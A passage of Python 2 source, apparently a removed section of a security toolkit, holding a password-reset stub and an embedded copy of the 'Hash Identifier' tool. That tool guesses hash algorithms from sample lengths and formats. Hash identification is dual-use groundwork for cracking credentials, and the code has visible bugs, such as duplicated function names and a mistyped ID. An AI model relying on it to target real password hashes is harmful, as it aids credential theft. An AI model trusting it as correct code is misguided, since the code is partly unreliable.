raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - 